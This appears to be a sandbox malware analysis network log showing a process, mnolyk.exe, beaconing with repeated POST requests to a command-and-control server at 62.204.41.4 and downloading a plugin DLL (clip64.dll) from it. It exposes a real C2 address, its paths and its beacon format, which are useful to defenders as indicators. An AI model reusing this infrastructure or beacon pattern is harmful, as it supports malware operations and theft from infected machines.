                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      194 | 192.168.2.7 | 49889 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:52.061130047 CET | 309 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.125670910 CET | 309 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      195 | 192.168.2.7 | 49890 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:52.300017118 CET | 310 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.362855911 CET | 310 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      196 | 192.168.2.7 | 49891 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:52.534100056 CET | 311 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.596692085 CET | 311 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      197 | 192.168.2.7 | 49892 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:52.780225039 CET | 312 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.843852043 CET | 312 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      198 | 192.168.2.7 | 49893 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:53.025577068 CET | 313 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.090089083 CET | 313 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      199 | 192.168.2.7 | 49894 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:53.270340919 CET | 314 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.332096100 CET | 314 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      2 | 192.168.2.7 | 49696 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:01.356877089 CET | 10 | OUT | GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 7, 2023 23:07:01.419603109 CET | 12 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:01 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 91136
                                                                      Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "63dd4219-16400"
                                                                      Accept-Ranges: bytes


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      20 | 192.168.2.7 | 49714 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:06.440543890 CET | 124 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.505444050 CET | 124 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      200 | 192.168.2.7 | 49895 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:53.534084082 CET | 315 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.597876072 CET | 315 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      201 | 192.168.2.7 | 49896 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:53.775433064 CET | 316 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.839123011 CET | 316 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      202 | 192.168.2.7 | 49897 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:54.022407055 CET | 317 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.087541103 CET | 317 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      203 | 192.168.2.7 | 49898 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:54.273097038 CET | 318 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.336081028 CET | 318 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      204 | 192.168.2.7 | 49899 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:54.525688887 CET | 319 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.588591099 CET | 319 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      205 | 192.168.2.7 | 49900 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:54.774755001 CET | 320 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.838352919 CET | 320 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      206 | 192.168.2.7 | 49901 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:55.355595112 CET | 321 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:55.425688982 CET | 321 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      207 | 192.168.2.7 | 49902 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:55.670942068 CET | 322 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:55.736519098 CET | 322 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      208 | 192.168.2.7 | 49903 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:56.006891012 CET | 323 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:56.071557999 CET | 323 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      209 | 192.168.2.7 | 49904 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:57.181548119 CET | 324 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:57.245490074 CET | 324 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      21 | 192.168.2.7 | 49715 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:06.670721054 CET | 125 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.733525038 CET | 125 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
